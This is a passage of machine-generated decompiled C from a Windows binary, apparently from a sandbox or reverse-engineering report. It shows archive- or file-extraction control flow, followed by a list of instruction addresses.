                																										E003DAB1A(_t697 + 0xd0, _t688,  *((intOrPtr*)(_t582 + 0x3308)),  *((intOrPtr*)( *(_t697 + 8) + 0x92e0)));
                																										E003DAB1A(_t697 + 0xa8, _t688,  *((intOrPtr*)(_t582 + 0x3308)),  *((intOrPtr*)( *(_t697 + 8) + 0x92e0)));
                																										_t442 =  *(_t582 + 0x32f0);
                																										_t712 = _t697 + 0x10;
                																										_t619 =  *(_t582 + 0x32f4);
                																										 *(_t697 + 0x38) = _t442;
                																										 *(_t697 + 0x30) = _t442;
                																										_t222 = _t721 - 0x1070; // -2160
                																										 *(_t697 + 0x3c) = _t619;
                																										 *(_t697 + 0x34) = _t619;
                																										E003DD099(_t712, _t582, _t222);
                																										_t621 =  *((intOrPtr*)(_t721 - 0x12));
                																										_t690 = 0;
                																										_t445 =  *(_t721 - 0xd);
                																										 *((char*)(_t697 + 0x41)) = _t621;
                																										 *((char*)(_t697 + 0x42)) = _t445;
                																										 *(_t721 - 0x28) = 0;
                																										 *(_t721 - 0x24) = 0;
                																										__eflags = _t621;
                																										if(_t621 != 0) {
                																											L132:
                																											_t622 =  *(_t697 + 8);
                																											__eflags =  *((char*)(_t622 + 0x71a0));
                																											 *((char*)(_t721 - 0x1053)) =  *((char*)(_t622 + 0x71a0)) == 0;
                																											__eflags =  *((char*)(_t721 - 0x12));
                																											if( *((char*)(_t721 - 0x12)) != 0) {
                																												L136:
                																												_t446 = _t690;
                																												 *((char*)(_t721 - 0x10)) = _t690;
                																												L137:
                																												__eflags =  *(_t721 - 0x20);
                																												 *((char*)(_t721 - 0x14)) = 1;
                																												 *((char*)(_t721 - 0xf)) = 1;
                																												if( *(_t721 - 0x20) == 0) {
                																													__eflags =  *(_t582 + 0x3330);
                																													if( *(_t582 + 0x3330) == 0) {
                																														__eflags =  *((char*)(_t582 + 0x22b8));
                																														if(__eflags != 0) {
                																															_push( *(_t582 + 0x3388) & 0x000000ff);
                																															_push( *((intOrPtr*)(_t582 + 0x338c)));
                																															E003E3377(_t582,  *((intOrPtr*)(_t697 + 0xe8)));
                																															_t485 =  *((intOrPtr*)(_t697 + 0xe8));
                																															 *(_t485 + 0x4c48) =  *(_t582 + 0x32f8);
                																															__eflags = 0;
                																															 *(_t485 + 0x4c4c) =  *(_t582 + 0x32fc);
                																															 *((char*)(_t485 + 0x4c60)) = 0;
                																															E003E3020( *((intOrPtr*)(_t697 + 0xe8)),  *((intOrPtr*)(_t582 + 0x22b4)),  *(_t582 + 0x3388) & 0x000000ff); // executed
                																														} else {
                																															_push( *(_t582 + 0x32fc));
                																															_push( *(_t582 + 0x32f8));
                																															_push(_t712);
                																															E003D9215(_t582, _t697, __eflags);
                																														}
                																													}
                																													L169:
                																													E003D1F47(_t582);
                																													__eflags =  *((char*)(_t582 + 0x3331));
                																													if( *((char*)(_t582 + 0x3331)) != 0) {
                																														L172:
                																														_t448 = 0;
                																														__eflags = 0;
                																														_t624 = 0;
                																														L173:
                																														__eflags =  *(_t582 + 0x3388);
                																														if( *(_t582 + 0x3388) != 0) {
                																															__eflags =  *((char*)(_t582 + 0x22b8));
                																															if( *((char*)(_t582 + 0x22b8)) == 0) {
                																																L181:
                																																__eflags =  *(_t721 - 0xd);
                																																 *((char*)(_t721 - 0x10)) = _t448;
                																																if( *(_t721 - 0xd) != 0) {
                																																	L191:
                																																	__eflags =  *(_t721 - 0x20);
                																																	_t691 =  *((intOrPtr*)(_t721 - 0xf));
                																																	if( *(_t721 - 0x20) == 0) {
                																																		L195:
                																																		_t625 = 0;
                																																		__eflags = 0;
                																																		L196:
                																																		__eflags =  *((char*)(_t721 - 0x12));
                																																		if( *((char*)(_t721 - 0x12)) != 0) {
                																																			goto L218;
                																																		}
                																																		_t713 =  *(_t721 - 0x18);
                																																		__eflags = _t713 -  *((intOrPtr*)(_t721 - 0x30));
                																																		if(_t713 ==  *((intOrPtr*)(_t721 - 0x30))) {
                																																			L199:
                																																			__eflags =  *(_t721 - 0x20);
                																																			if( *(_t721 - 0x20) == 0) {
                																																				L203:
                																																				__eflags = _t448;
                																																				if(_t448 == 0) {
                																																					L206:
                																																					__eflags = _t625;
                																																					if(_t625 != 0) {
                																																						L214:
                																																						_t449 =  *(_t697 + 8);
                																																						__eflags =  *((char*)(_t449 + 0x71a8));
                																																						if( *((char*)(_t449 + 0x71a8)) == 0) {
                																																							_t714 = _t697 + 0x1100;
                																																							_t450 = E003DA4ED(_t697 + 0x1100,  *((intOrPtr*)(_t582 + 0x22bc))); // executed
                																																							__eflags = _t450;
                																																							if(__eflags == 0) {
                																																								E003D2021(__eflags, 0x11, _t582 + 0x32, _t714);
                																																								E003D6DCB(0x411098, __eflags);
                																																							}
                																																						}
                																																						 *(_t697 + 0x10ff) = 1;
                																																						goto L218;
                																																					}
                																																					_t692 =  *(_t721 - 0x24);
                																																					__eflags = _t692;
                																																					_t628 =  *(_t721 - 0x28);
                																																					if(_t692 > 0) {
                																																						L209:
                																																						__eflags = _t448;
                																																						if(_t448 != 0) {
                																																							L212:
                																																							_t341 = _t721 - 0x1070; // -2160
                																																							E003D9F09(_t341);
                																																							L213:
                																																							_t702 = _t582 + 0x32d8;
                																																							asm("sbb eax, eax");
                																																							asm("sbb ecx, ecx");
                																																							asm("sbb eax, eax");
                																																							_t349 = _t721 - 0x1070; // -2160
                																																							E003D9DA2(_t349, _t582 + 0x32e8,  ~( *( *(_t697 + 8) + 0x82d0)) & _t702,  ~( *( *(_t697 + 8) + 0x82d4)) & _t582 + 0x000032e0,  ~( *( *(_t697 + 8) + 0x82d8)) & _t582 + 0x000032e8);
                																																							_t350 = _t721 - 0x1070; // -2160
                																																							E003D9620(_t350);
                																																							E003D7A78( *((intOrPtr*)(_t721 - 0x1c)),  *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)), _t582,  *((intOrPtr*)(_t721 - 0x38)));
                																																							asm("sbb eax, eax");
                																																							asm("sbb eax, eax");
                																																							__eflags =  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d0)) & _t702;
                																																							E003D9D9F( ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d0)) & _t702,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d0)) & _t702,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d8)) & _t582 + 0x000032e8);
                																																							_t697 =  *((intOrPtr*)(_t721 - 0x1c));
                																																							goto L214;
                																																						}
                																																						__eflags =  *((intOrPtr*)(_t697 + 0x88)) - _t628;
                																																						if( *((intOrPtr*)(_t697 + 0x88)) != _t628) {
                																																							goto L212;
                																																						}
                																																						__eflags =  *((intOrPtr*)(_t697 + 0x8c)) - _t692;
                																																						if( *((intOrPtr*)(_t697 + 0x8c)) == _t692) {
                																																							goto L213;
                																																						}
                																																						goto L212;
                																																					}
                																																					__eflags = _t628;
                																																					if(_t628 == 0) {
                																																						goto L213;
                																																					}
                																																					goto L209;
                																																				}
                																																				_t473 =  *(_t697 + 8);
                																																				__eflags =  *((char*)(_t473 + 0x71a0));
                																																				if( *((char*)(_t473 + 0x71a0)) == 0) {
                																																					goto L218;
                																																				}
                																																				_t448 =  *((intOrPtr*)(_t721 - 0x10));
                																																				goto L206;
                																																			}
                																																			__eflags = _t625;
                																																			if(_t625 != 0) {
                																																				goto L203;
                																																			}
                																																			__eflags =  *(_t582 + 0x3398) - 5;
                																																			if( *(_t582 + 0x3398) != 5) {
                																																				goto L218;
                																																			}
                																																			__eflags = _t691;
                																																			if(_t691 == 0) {
                																																				goto L218;
                																																			}
                																																			goto L203;
                																																		}
                																																		__eflags = _t713 -  *((intOrPtr*)(_t721 - 0x34));
                																																		if(_t713 !=  *((intOrPtr*)(_t721 - 0x34))) {
                																																			goto L218;
                																																		}
                																																		goto L199;
                																																	}
                																																	__eflags =  *(_t582 + 0x3398) - 4;
                																																	if( *(_t582 + 0x3398) != 4) {
                																																		goto L195;
                																																	}
                																																	__eflags = _t691;
                																																	if(_t691 == 0) {
                																																		goto L195;
                																																	}
                																																	_t625 = 1;
                																																	goto L196;
                																																}
                																																__eflags =  *((char*)(_t721 - 0x14));
                																																if( *((char*)(_t721 - 0x14)) == 0) {
                																																	goto L191;
                																																}
                																																__eflags = _t624;
                																																if(_t624 != 0) {
                																																	goto L191;
                																																}
                																																__eflags =  *(_t582 + 0x3333) - _t624;
                																																if(__eflags == 0) {
                																																	L189:
                																																	_push(3);
                																																	L190:
                																																	_pop(_t637);
                																																	_t321 = _t721 - 0x30b8; // -10424
                																																	E003D2021(__eflags, _t637, _t582 + 0x32, _t321);
                																																	 *((char*)(_t721 - 0x10)) = 1;
                																																	E003D6D83(0x411098, 3);
                																																	_t448 =  *((intOrPtr*)(_t721 - 0x10));
                																																	goto L191;
                																																}
                																																__eflags =  *((intOrPtr*)(_t582 + 0x3359)) - _t624;
                																																if( *((intOrPtr*)(_t582 + 0x3359)) == _t624) {
                																																	L187:
                																																	__eflags =  *((char*)(_t697 + 0xfc));
                																																	if(__eflags != 0) {
                																																		goto L189;
                																																	}
                																																	_push(4);
                																																	goto L190;
                																																}
                																																__eflags =  *(_t582 + 0x6cdc) - _t624;
                																																if(__eflags == 0) {
                																																	goto L189;
                																																}
                																																goto L187;
                																															}
                																															__eflags =  *(_t582 + 0x32fc) - _t448;
                																															if(__eflags < 0) {
                																																goto L181;
                																															}
                																															if(__eflags > 0) {
                																																L179:
                																																__eflags = _t624;
                																																if(_t624 != 0) {
                																																	 *((char*)(_t697 + 0xfc)) = 1;
                																																}
                																																goto L181;
                																															}
                																															__eflags =  *(_t582 + 0x32f8) - _t448;
                																															if( *(_t582 + 0x32f8) <= _t448) {
                																																goto L181;
                																															}
                																															goto L179;
                																														}
                																														 *((char*)(_t697 + 0xfc)) = _t448;
                																														goto L181;
                																													}
                																													asm("sbb eax, eax");
                																													_t482 = E003DAAEA(_t582, _t697 + 0xd0, _t582 + 0x3308,  ~( *(_t582 + 0x3362) & 0x000000ff) & _t582 + 0x00003363);
                																													__eflags = _t482;
                																													if(_t482 == 0) {
                																														goto L172;
                																													}
                																													_t624 = 1;
                																													_t448 = 0;
                																													goto L173;
                																												}
                																												_t716 =  *(_t582 + 0x3398);
                																												__eflags = _t716 - 4;
                																												if(_t716 == 4) {
                																													L151:
                																													_t270 = _t721 - 0x50b8; // -18616
                																													E003DB76C(_t582, _t582 + 0x339c, _t270, 0x800);
                																													_push(0x800);
                																													_t272 = _t721 - 0x40b8; // -14520
                																													_t645 = _t697;
                																													_t273 = _t721 - 0x50b8; // -18616
                																													_push(_t582);
                																													E003D8167(__eflags);
                																													_t446 =  *((intOrPtr*)(_t721 - 0x10));
                																													__eflags = _t446;
                																													if(_t446 == 0) {
                																														L159:
                																														_t646 =  *((intOrPtr*)(_t721 - 0xf));
                																														L160:
                																														__eflags =  *((intOrPtr*)(_t582 + 0x6cc8)) - 2;
                																														if( *((intOrPtr*)(_t582 + 0x6cc8)) != 2) {
                																															L146:
                																															__eflags = _t446;
                																															if(_t446 == 0) {
                																																L163:
                																																_t495 = 0;
                																																__eflags = 0;
                																																L164:
                																																 *(_t697 + 0x10ff) = _t495;
                																																goto L169;
                																															}
                																															L147:
                																															__eflags = _t646;
                																															if(_t646 == 0) {
                																																goto L163;
                																															}
                																															_t495 = 1;
                																															goto L164;
                																														}
                																														__eflags = _t446;
                																														if(_t446 != 0) {
                																															goto L147;
                																														}
                																														L145:
                																														 *((char*)(_t721 - 0x14)) = 0;
                																														goto L146;
                																													}
                																													__eflags =  *((short*)(_t721 - 0x40b8));
                																													if( *((short*)(_t721 - 0x40b8)) == 0) {
                																														goto L159;
                																													}
                																													_t276 = _t721 - 0x40b8; // -14520
                																													_push(0x800);
                																													_push(_t697 + 0x1100);
                																													__eflags = _t716 - 4;
                																													if(__eflags != 0) {
                																														_push(_t582 + 0x32);
                																														_t281 = _t721 - 0x1070; // -2160
                																														_t500 = E003D9155(_t690, _t697, _t716, __eflags);
                																														_t646 = _t500;
                																														 *((char*)(_t721 - 0xf)) = _t500;
                																														L157:
                																														__eflags = _t646;
                																														if(_t646 == 0) {
                																															L144:
                																															_t446 =  *((intOrPtr*)(_t721 - 0x10));
                																															goto L145;
                																														}
                																														_t446 =  *((intOrPtr*)(_t721 - 0x10));
                																														goto L160;
                																													}
                																													_push( *(_t697 + 8));
                																													_t501 = E003D7542(_t645, _t697, __eflags);
                																													L155:
                																													_t646 = _t501;
                																													 *((char*)(_t721 - 0xf)) = _t646;
                																													goto L157;
                																												}
                																												__eflags = _t716 - 5;
                																												if(_t716 == 5) {
                																													goto L151;
                																												}
                																												__eflags = _t716 - 1;
                																												if(_t716 == 1) {
                																													L149:
                																													__eflags = _t446;
                																													if(_t446 == 0) {
                																														goto L159;
                																													}
                																													_push(_t697 + 0x1100);
                																													_t501 = E003D77B8(_t622, _t697 + 0x10, _t582);
                																													goto L155;
                																												}
                																												__eflags = _t716 - 2;
                																												if(_t716 == 2) {
                																													goto L149;
                																												}
                																												__eflags = _t716 - 3;
                																												if(__eflags == 0) {
                																													goto L149;
                																												}
                																												E003D2021(__eflags, 0x47, _t582 + 0x32, _t697 + 0x1100);
                																												__eflags = 0;
                																												_t646 = 0;
                																												 *((char*)(_t721 - 0xf)) = 0;
                																												goto L144;
                																											}
                																											__eflags = _t445;
                																											if(_t445 != 0) {
                																												goto L136;
                																											}
                																											_t508 = 0x50;
                																											__eflags =  *(_t721 - 0x18) - _t508;
                																											if( *(_t721 - 0x18) == _t508) {
                																												goto L136;
                																											}
                																											_t446 = 1;
                																											 *((char*)(_t721 - 0x10)) = 1;
                																											goto L137;
                																										}
                																										__eflags =  *(_t582 + 0x6cdc);
                																										if( *(_t582 + 0x6cdc) != 0) {
                																											goto L132;
                																										}
                																										_t717 =  *(_t582 + 0x32fc);
                																										_t695 =  *(_t582 + 0x32f8);
                																										__eflags = _t717;
                																										if(__eflags < 0) {
                																											L131:
                																											_t690 = 0;
                																											__eflags = 0;
                																											_t712 = _t697 + 0x10;
                																											goto L132;
                																										}
                																										if(__eflags > 0) {
                																											L119:
                																											_t649 =  *(_t582 + 0x32f0);
                																											_t650 = _t649 << 0xa;
                																											__eflags = ( *(_t582 + 0x32f4) << 0x00000020 | _t649) << 0xa - _t717;
                																											if(__eflags < 0) {
                																												L130:
                																												_t445 =  *(_t721 - 0xd);
                																												goto L131;
                																											}
                																											if(__eflags > 0) {
                																												L122:
                																												__eflags =  *((intOrPtr*)(_t582 + 0x10)) - 1;
                																												if( *((intOrPtr*)(_t582 + 0x10)) == 1) {
                																													goto L130;
                																												}
                																												__eflags = _t717;
                																												if(__eflags < 0) {
                																													L129:
                																													_t244 = _t721 - 0x1070; // -2160
                																													E003D9A3C(_t244,  *(_t582 + 0x32f8),  *(_t582 + 0x32fc));
                																													 *(_t721 - 0x28) =  *(_t582 + 0x32f8);
                																													 *(_t721 - 0x24) =  *(_t582 + 0x32fc);
                																													goto L130;
                																												}
                																												if(__eflags > 0) {
                																													L126:
                																													_t515 = E003D981A(_t695);
                																													__eflags = _t695 -  *(_t582 + 0x32f4);
                																													if(__eflags < 0) {
                																														goto L130;
                																													}
                																													if(__eflags > 0) {
                																														goto L129;
                																													}
                																													__eflags = _t515 -  *(_t582 + 0x32f0);
                																													if(_t515 <=  *(_t582 + 0x32f0)) {
                																														goto L130;
                																													}
                																													goto L129;
                																												}
                																												__eflags = _t695 - 0x5f5e100;
                																												if(_t695 < 0x5f5e100) {
                																													goto L129;
                																												}
                																												goto L126;
                																											}
                																											__eflags = _t650 - _t695;
                																											if(_t650 <= _t695) {
                																												goto L130;
                																											}
                																											goto L122;
                																										}
                																										__eflags = _t695 - 0xf4240;
                																										if(_t695 <= 0xf4240) {
                																											goto L131;
                																										}
                																										goto L119;
                																									}
                																									L113:
                																									_t202 = _t697 + 0xec;
                																									 *_t202 =  *(_t697 + 0xec) + 1;
                																									__eflags =  *_t202;
                																									goto L114;
                																								}
                																								 *((char*)(_t721 - 0x12)) = 0;
                																								_t517 = 0x50;
                																								__eflags = _t616 - _t517;
                																								if(_t616 != _t517) {
                																									_t196 = _t721 - 0x1070; // -2160
                																									__eflags = E003D98BC(_t196);
                																									if(__eflags != 0) {
                																										E003D2021(__eflags, 0x3b, _t582 + 0x32, _t697 + 0x1100);
                																										E003D6E98(0x411098, _t721, _t582 + 0x32, _t697 + 0x1100);
                																									}
                																								}
                																								goto L113;
                																							}
                																							 *(_t697 + 0x10ff) = 1;
                																							__eflags =  *((char*)(_t435 + 0x7201));
                																							if( *((char*)(_t435 + 0x7201)) != 0) {
                																								_t436 =  *(_t721 - 0xd);
                																								goto L112;
                																							}
                																							goto L107;
                																						}
                																						 *(_t721 - 0xd) = _t431;
                																						 *(_t721 - 0xe) = _t431;
                																						_t185 = _t721 - 0x30b8; // -10424
                																						_t525 = L003E1B7F(__eflags, _t185, 0, 0, _t431);
                																						__eflags = _t525;
                																						if(_t525 != 0) {
                																							goto L104;
                																						}
                																						__eflags = 0;
                																						 *(_t721 - 0x24) = 0;
                																						L102:
                																						_t187 = _t721 - 0x1070; // -2160
                																						E003D959A(_t187);
                																						_t406 =  *(_t721 - 0x24);
                																						goto L15;
                																					}
                																					_t180 = _t721 - 0x1070; // -2160
                																					_push(_t582);
                																					_t529 = E003D7FC0(_t697);
                																					_t613 = _t529;
                																					 *(_t721 - 0xe) = _t529;
                																					L97:
                																					__eflags = _t613;
                																					if(_t613 != 0) {
                																						goto L104;
                																					}
                																					goto L98;
                																				}
                																				__eflags =  *(_t721 - 0xe);
                																				if( *(_t721 - 0xe) != 0) {
                																					_t530 =  *(_t721 - 0x18);
                																					__eflags = _t530 - 0x50;
                																					if(_t530 != 0x50) {
                																						_t657 = 0x49;
                																						__eflags = _t530 - _t657;
                																						if(_t530 != _t657) {
                																							_t658 = 0x45;
                																							__eflags = _t530 - _t658;
                																							if(_t530 != _t658) {
                																								_t531 =  *(_t697 + 8);
                																								__eflags =  *((intOrPtr*)(_t531 + 0x7160)) - 1;
                																								if( *((intOrPtr*)(_t531 + 0x7160)) != 1) {
                																									 *(_t697 + 0xec) =  *(_t697 + 0xec) + 1;
                																									_t178 = _t721 - 0x30b8; // -10424
                																									_push(_t582);
                																									E003D7DB2(_t697);
                																								}
                																							}
                																						}
                																					}
                																				}
                																				goto L102;
                																			}
                																			__eflags = _t611 - 5;
                																			if(_t611 == 5) {
                																				goto L88;
                																			}
                																			_t613 =  *(_t721 - 0xe);
                																			__eflags = _t613;
                																			if(_t613 == 0) {
                																				goto L99;
                																			}
                																			_t616 =  *(_t721 - 0x18);
                																			__eflags = _t616 - _t688;
                																			if(_t616 == _t688) {
                																				goto L105;
                																			}
                																			_t534 =  *(_t697 + 8);
                																			__eflags =  *((char*)(_t534 + 0x7201));
                																			if( *((char*)(_t534 + 0x7201)) != 0) {
                																				goto L105;
                																			}
                																			_t719 = _t697 + 0x1100;
                																			 *((char*)(_t721 - 0x12)) = 0;
                																			_t536 = E003DA231(_t719);
                																			__eflags = _t536;
                																			if(_t536 == 0) {
                																				L86:
                																				__eflags =  *((char*)(_t721 - 0x12));
                																				if( *((char*)(_t721 - 0x12)) == 0) {
                																					goto L104;
                																				}
                																				L87:
                																				_t613 = 0;
                																				 *(_t721 - 0xe) = 0;
                																				goto L97;
                																			}
                																			__eflags =  *((char*)(_t721 - 0x12));
                																			if( *((char*)(_t721 - 0x12)) != 0) {
                																				goto L87;
                																			}
                																			__eflags = 0;
                																			_push(0);
                																			_push(_t582 + 0x32d8);
                																			_push( *(_t582 + 0x32fc));
                																			_t167 = _t721 - 0x12; // 0x7ee
                																			_push( *(_t582 + 0x32f8));
                																			_push(0x800);
                																			_push(_t719);
                																			_push(0);
                																			_push( *(_t697 + 8));
                																			E003D92A3();
                																			goto L86;
                																		}
                																		__eflags =  *((char*)(_t582 + 0x3359));
                																		if( *((char*)(_t582 + 0x3359)) == 0) {
                																			goto L77;
                																		}
                																		_t137 = _t721 - 0x2c; // 0x7d4
                																		_t543 = E003F0C4A(_t582 + 0x335a, _t137, 8);
                																		_t723 = _t725 + 0xc;
                																		__eflags = _t543;
                																		if(_t543 == 0) {
                																			goto L77;
                																		}
                																		__eflags =  *(_t582 + 0x6cdc);
                																		_t697 =  *((intOrPtr*)(_t721 - 0x1c));
                																		if( *(_t582 + 0x6cdc) != 0) {
                																			goto L78;
                																		}
                																		__eflags =  *((char*)(_t697 + 0x10fe));
                																		_t142 = _t721 - 0x30b8; // -10424
                																		_push(_t582 + 0x32);
                																		if(__eflags != 0) {
                																			_push(6);
                																			E003D2021(__eflags);
                																			E003D6D83(0x411098, 0xb);
                																			 *(_t721 - 0xe) = 0;
                																			goto L78;
                																		}
                																		_push(0x83);
                																		E003D2021(__eflags);
                																		E003DF279( *(_t697 + 8) + 0x6024);
                																		 *(_t721 - 4) =  *(_t721 - 4) | 0xffffffff;
                																		_t147 = _t721 - 0x1174; // -2420
                																		L003DF204(_t147);
                																	}
                																}
                																E003D6D83(0x411098, 2);
                																_t554 = E003D1F47(_t582);
                																__eflags =  *(_t582 + 0x6ccc);
                																_t406 = _t554 & 0xffffff00 |  *(_t582 + 0x6ccc) == 0x00000000;
                																goto L15;
                															}
                															_t106 = _t721 - 0x10a8; // -2216
                															_t556 = E003D7BE7(_t106, _t582 + 0x32d8);
                															__eflags = _t556;
                															if(_t556 == 0) {
                																goto L65;
                															}
                															__eflags =  *((char*)(_t721 - 0x10ac));
                															if( *((char*)(_t721 - 0x10ac)) == 0) {
                																L63:
                																 *(_t721 - 0xe) = 0;
                																goto L65;
                															}
                															_t108 = _t721 - 0x10a8; // -2216
                															_t558 = E003D7BCA(_t108, _t697);
                															__eflags = _t558;
                															if(_t558 == 0) {
                																goto L65;
                															}
                															goto L63;
                														}
                														__eflags = _t707 - _t686;
                														if(_t707 != _t686) {
                															goto L65;
                														}
                														goto L59;
                													}
                													__eflags =  *((char*)(_t411 + 0x715c));
                													if( *((char*)(_t411 + 0x715c)) == 0) {
                														goto L65;
                													}
                													goto L57;
                												}
                												__eflags =  *(_t697 + 0x1100);
                												if( *(_t697 + 0x1100) == 0) {
                													goto L54;
                												}
                												 *(_t721 - 0xe) = 1;
                												__eflags =  *(_t582 + 0x3330);
                												if( *(_t582 + 0x3330) == 0) {
                													goto L55;
                												}
                												goto L54;
                											}
                											__eflags = _t707 - _t400;
                											_t401 = 1;
                											if(_t707 != _t400) {
                												goto L50;
                											}
                											goto L49;
                										}
                										L45:
                										_t689 =  *(_t582 + 0x6ccc);
                										 *(_t721 - 0xd) = _t689;
                										 *(_t721 - 0x28) = _t689;
                										__eflags = _t689;
                										if(_t689 == 0) {
                											goto L220;
                										}
                										_t685 = 0;
                										__eflags = 0;
                										goto L47;
                									}
                									_t398 =  *(_t697 + 8);
                									__eflags =  *(_t398 + 0x6127);
                									if( *(_t398 + 0x6127) == 0) {
                										goto L44;
                									}
                									__eflags =  *(_t582 + 0x6ccc);
                									if( *(_t582 + 0x6ccc) != 0) {
                										goto L14;
                									}
                									 *(_t721 - 0x11) = 0;
                									goto L45;
                								}
                								__eflags =  *(_t697 + 0xf4) -  *((intOrPtr*)(_t586 + 0xb334));
                								if( *(_t697 + 0xf4) <  *((intOrPtr*)(_t586 + 0xb334))) {
                									goto L29;
                								}
                								__eflags =  *((char*)(_t697 + 0xf9));
                								if( *((char*)(_t697 + 0xf9)) != 0) {
                									goto L14;
                								}
                								goto L29;
                							}
                							if(__eflags < 0) {
                								L25:
                								 *(_t582 + 0x32f8) = _t684;
                								 *(_t582 + 0x32fc) = _t684;
                								goto L26;
                							}
                							__eflags =  *(_t582 + 0x32f8) - _t684;
                							if( *(_t582 + 0x32f8) >= _t684) {
                								goto L26;
                							}
                							goto L25;
                						}
                						if(__eflags < 0) {
                							L21:
                							 *(_t582 + 0x32f0) = _t684;
                							 *(_t582 + 0x32f4) = _t684;
                							goto L22;
                						}
                						__eflags =  *(_t582 + 0x32f0) - _t684;
                						if( *(_t582 + 0x32f0) >= _t684) {
                							goto L22;
                						}
                						goto L21;
                					}
                					if(_t383 != 3) {
                						__eflags = _t383 - 5;
                						if(_t383 != 5) {
                							goto L9;
                						}
                						__eflags =  *((char*)(_t582 + 0x45c4));
                						if( *((char*)(_t582 + 0x45c4)) == 0) {
                							goto L14;
                						}
                						_push(_t585);
                						_push(_t684);
                						_push(_t704);
                						_push(_t582);
                						_t573 = E003E8C8D();
                						__eflags = _t573;
                						if(_t573 != 0) {
                							__eflags = 0;
                							 *0x403278( *((intOrPtr*)(_t582 + 0x6cb8)),  *((intOrPtr*)(_t582 + 0x6cbc)), 0);
                							 *((intOrPtr*)( *((intOrPtr*)( *_t582 + 0x10))))();
                							goto L17;
                						}
                						L13:
                						E003D6D83(0x411098, 1);
                						goto L14;
                					} else {
                						if( *(_t697 + 0x10ff) != 0) {
                							E003D7A0D(_t582, _t721,  *(_t697 + 8), _t582, _t697 + 0x1100);
                						}
                						goto L9;
                					}
                				}
                				if( *((intOrPtr*)(__ecx + 0x67)) == 0) {
                					goto L14;
                				}
                				_push(_t585);
                				_push(0);
                				_t704 = __ecx + 0x10;
                				_push(_t704);
                				_push(_t582);
                				 *(_t721 - 0x20) = _t704;
                				if(E003E8C8D() == 0) {
                					goto L13;
                				} else {
                					_t585 =  *(_t721 - 0x18);
                					_t684 = 0;
                					goto L5;
                				}
                			}
                0x00000000
                0x003d8f62
                0x003d8f1c
                0x003d8f22
                0x00000000
                0x00000000
                0x003d8f24
                0x003d8f2e
                0x003d8f2e
                0x003d8f30
                0x003d8f32
                0x003d8f32
                0x00000000
                0x003d8f30
                0x003d8f26
                0x003d8f2c
                0x00000000
                0x00000000
                0x00000000
                0x003d8f2c
                0x003d8f0b
                0x00000000
                0x003d8f0b
                0x003d8edd
                0x003d8eef
                0x003d8ef4
                0x003d8ef6
                0x00000000
                0x00000000
                0x003d8ef8
                0x003d8efa
                0x00000000
                0x003d8efa
                0x003d8d18
                0x003d8d1e
                0x003d8d21
                0x003d8d8a
                0x003d8d8f
                0x003d8d9d
                0x003d8da2
                0x003d8da7
                0x003d8dad
                0x003d8db0
                0x003d8db7
                0x003d8db8
                0x003d8dbd
                0x003d8dc0
                0x003d8dc2
                0x003d8e19
                0x003d8e19
                0x003d8e1c
                0x003d8e1c
                0x003d8e23
                0x003d8d57
                0x003d8d57
                0x003d8d59
                0x003d8e36
                0x003d8e36
                0x003d8e36
                0x003d8e38
                0x003d8e38
                0x00000000
                0x003d8e38
                0x003d8d5f
                0x003d8d5f
                0x003d8d61
                0x00000000
                0x00000000
                0x003d8d67
                0x00000000
                0x003d8d67
                0x003d8e29
                0x003d8e2b
                0x00000000
                0x00000000
                0x003d8d53
                0x003d8d53
                0x00000000
                0x003d8d53
                0x003d8dc4
                0x003d8dcc
                0x00000000
                0x00000000
                0x003d8dce
                0x003d8dd4
                0x003d8de0
                0x003d8de1
                0x003d8de4
                0x003d8dfa
                0x003d8dfb
                0x003d8e02
                0x003d8e07
                0x003d8e09
                0x003d8e0c
                0x003d8e0c
                0x003d8e0e
                0x003d8d50
                0x003d8d50
                0x00000000
                0x003d8d50
                0x003d8e14
                0x00000000
                0x003d8e14
                0x003d8de6
                0x003d8de9
                0x003d8dee
                0x003d8dee
                0x003d8df0
                0x00000000
                0x003d8df0
                0x003d8d23
                0x003d8d26
                0x00000000
                0x00000000
                0x003d8d28
                0x003d8d2b
                0x003d8d6e
                0x003d8d6e
                0x003d8d70
                0x00000000
                0x00000000
                0x003d8d7c
                0x003d8d83
                0x00000000
                0x003d8d83
                0x003d8d2d
                0x003d8d30
                0x00000000
                0x00000000
                0x003d8d32
                0x003d8d35
                0x00000000
                0x00000000
                0x003d8d44
                0x003d8d49
                0x003d8d4b
                0x003d8d4d
                0x00000000
                0x003d8d4d
                0x003d8ced
                0x003d8cef
                0x00000000
                0x00000000
                0x003d8cf3
                0x003d8cf4
                0x003d8cf8
                0x00000000
                0x00000000
                0x003d8cfa
                0x003d8cfc
                0x00000000
                0x003d8cfc
                0x003d8c2d
                0x003d8c33
                0x00000000
                0x00000000
                0x003d8c39
                0x003d8c41
                0x003d8c47
                0x003d8c49
                0x003d8cd1
                0x003d8cd1
                0x003d8cd1
                0x003d8cd3
                0x00000000
                0x003d8cd3
                0x003d8c4f
                0x003d8c59
                0x003d8c59
                0x003d8c69
                0x003d8c6c
                0x003d8c6e
                0x003d8cce
                0x003d8cce
                0x00000000
                0x003d8cce
                0x003d8c70
                0x003d8c76
                0x003d8c76
                0x003d8c7a
                0x00000000
                0x00000000
                0x003d8c7e
                0x003d8c80
                0x003d8ca5
                0x003d8cab
                0x003d8cb7
                0x003d8cc2
                0x003d8ccb
                0x00000000
                0x003d8ccb
                0x003d8c82
                0x003d8c8c
                0x003d8c8e
                0x003d8c93
                0x003d8c99
                0x00000000
                0x00000000
                0x003d8c9b
                0x00000000
                0x00000000
                0x003d8c9d
                0x003d8ca3
                0x00000000
                0x00000000
                0x00000000
                0x003d8ca3
                0x003d8c84
                0x003d8c8a
                0x00000000
                0x00000000
                0x00000000
                0x003d8c8a
                0x003d8c72
                0x003d8c74
                0x00000000
                0x00000000
                0x00000000
                0x003d8c74
                0x003d8c51
                0x003d8c57
                0x00000000
                0x00000000
                0x00000000
                0x003d8c57
                0x003d8b8f
                0x003d8b8f
                0x003d8b8f
                0x003d8b8f
                0x00000000
                0x003d8b8f
                0x003d8b46
                0x003d8b49
                0x003d8b4a
                0x003d8b4d
                0x003d8b4f
                0x003d8b5a
                0x003d8b5c
                0x003d8b6b
                0x003d8b7d
                0x003d8b7d
                0x003d8b5c
